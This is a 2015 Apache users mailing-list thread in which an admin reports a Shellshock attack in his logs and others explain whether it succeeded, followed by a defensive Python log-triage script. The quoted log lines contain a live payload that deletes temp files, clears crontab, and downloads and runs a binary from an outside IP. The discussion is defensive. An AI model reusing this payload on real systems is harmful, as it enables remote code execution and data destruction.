httpd-users mailing list archives

From "Bremser, Kurt (AMOS Austria GmbH)" <Kurt.Brem...@allianz.at>
Subject Re: [users@httpd] Security question
Date Fri, 03 Jul 2015 06:05:22 GMT
I guess that the 200 comes from the fact that apache simply delivered the /index.html page.
Or did you find that "sc.gif" was transferred and executed?

Kurt Bremser
AMOS Austria

Newton was wrong. There is no gravity. The Earth sucks.
________________________________
From: Victor Sterpu [victor@casnt.ro]
Sent: Thursday, 2 July 2015 14:29
To: users@httpd.apache.org
Subject: **SPAM?** Re: [users@httpd] Security question [wd-vc]

In the end the attack was successful. The log shows the last command:
62.1.212.154 - - [01/Jul/2015:17:01:55 +0300] "GET / HTTP/1.1" 200 885 "-" "() { :;};/usr/bin/perl
-e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/
; rm -rf /tmp/* ; rm -rf /var/tmp/* ; rm -rf /tmp/.* ; rm -rf /var/tmp/.* ; crontab -r ; killall
-9 wget fetch curl lwp-download b f r xx y i.gif print start pscan pnscan ps ; wget http://80.68.94.216/sc.gif
; curl -O http://80.68.94.216/sc.gif ; chmod +x sc.gif ; nohup ./sc.gif & \");'"

But I don't know how he launched this script.
How can I prevent this?
I was hoping the server would execute only local scripts. Is there something I can do to allow
only local scripts to be executed?


On 02.07.2015 15:13, Yehuda Katz wrote:

It is an attempt to exploit a specific configuration. By the fact that apache returned a 404
(the log line says so), you can see that the attempt was not successful.

- Y

Sent from a gizmo with a very small keyboard and hyperactive autocorrect.

On Jul 2, 2015 8:00 AM, "Victor Sterpu" <victor@casnt.ro> wrote:
Hello

A hacker attacked an apache2 web server by HTTP injection.
The log shows what he has done:
62.1.212.154 - - [01/Jul/2015:17:02:06 +0300] "GET /phppath/cgi_wrapper HTTP/1.1" 404 280
"-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd
/var/tmp/ ;cd /tmp/ ; rm -rf /tmp/* ; rm -rf /var/tmp/* ; rm -rf /tmp/.* ; rm -rf /var/tmp/.*
; crontab -r ; killall -9 wget fetch curl lwp-download b f r xx y i.gif print start pscan
pnscan ps ; wget http://80.68.94.216/sc.gif ; curl -O http://80.68.94.216/sc.gif ; chmod +x
sc.gif ; nohup ./sc.gif & \");'"

How can I prevent this in the future and how can I reproduce?
I tried to reproduce it, but it is not clear how he launched this command, and I want to know so I
can test my vulnerabilities in the future.
The path "/phppath/cgi_wrapper" doesn't exist at all.

Thank you




AMOS Austria GmbH 
1130 Wien, Hietzinger Kai 101-105 
FN 365014k, Handelsgericht Wien 
UID: ATU 66614737 

http://www.allianz.at 
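As an added illustration of the point made in this thread (example code written for this archive page, not posted by any of the participants): a small triage script that parses Apache combined-format log lines, flags requests whose User-Agent or Referer carries the `() {` bash function-definition prefix seen above, and separates a 404 (no handler ran) from a 2xx on a static path (the file was just served, as Kurt notes) and a 2xx on a CGI-looking path (worth investigating). The CGI path heuristic and the sample lines are assumptions constructed for the example.

```python
import re
from typing import Optional

# Apache "combined" format: host ident user [time] "request" status size "referer" "user-agent".
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>.*)"$'
)
# The bash function-definition prefix that opens the payload quoted in the thread ("() { :;};").
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')
# Heuristic (assumption): path fragments that usually reach a script handler, where bash could
# actually receive the header as an environment variable.
CGI_HINTS = ("cgi", ".sh", ".pl")

def parse_line(line: str) -> Optional[dict]:
    """Return the named fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def classify(entry: dict) -> str:
    """Label one parsed request from a defender's point of view."""
    if not (SHELLSHOCK_RE.search(entry["ua"]) or SHELLSHOCK_RE.search(entry["referer"])):
        return "clean"
    status = int(entry["status"])
    path = entry["path"].lower()
    if status == 404:
        return "attempt-404"          # no handler ran, so nothing interpreted the header
    if status < 300 and any(h in path for h in CGI_HINTS):
        return "attempt-cgi-2xx"      # a script handler answered: investigate this host
    return "attempt-static-2xx"       # e.g. "/" served as index.html; header not interpreted

def triage(lines):
    """Return (label, host, path, status) for every line that parses."""
    out = []
    for line in lines:
        e = parse_line(line)
        if e:
            out.append((classify(e), e["host"], e["path"], e["status"]))
    return out

# Constructed sample lines: shortened versions of the two requests in the thread plus one benign hit.
SAMPLE_LOG = [
    '62.1.212.154 - - [01/Jul/2015:17:01:55 +0300] "GET / HTTP/1.1" 200 885 "-" '
    '"() { :;};/usr/bin/perl -e \'print \\"XSUCCESS!\\";\'"',
    '62.1.212.154 - - [01/Jul/2015:17:02:06 +0300] "GET /phppath/cgi_wrapper HTTP/1.1" 404 280 "-" '
    '"() { :;};/usr/bin/perl -e \'print \\"XSUCCESS!\\";\'"',
    '198.51.100.7 - - [01/Jul/2015:17:03:00 +0300] "GET /index.html HTTP/1.1" 200 885 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for row in triage(SAMPLE_LOG):
        print(row)
```

The labels only say what the access log can say; a 2xx on a static path is not proof that nothing ran, so the host should still be checked for whether any CGI or other bash-backed handler was enabled at the time.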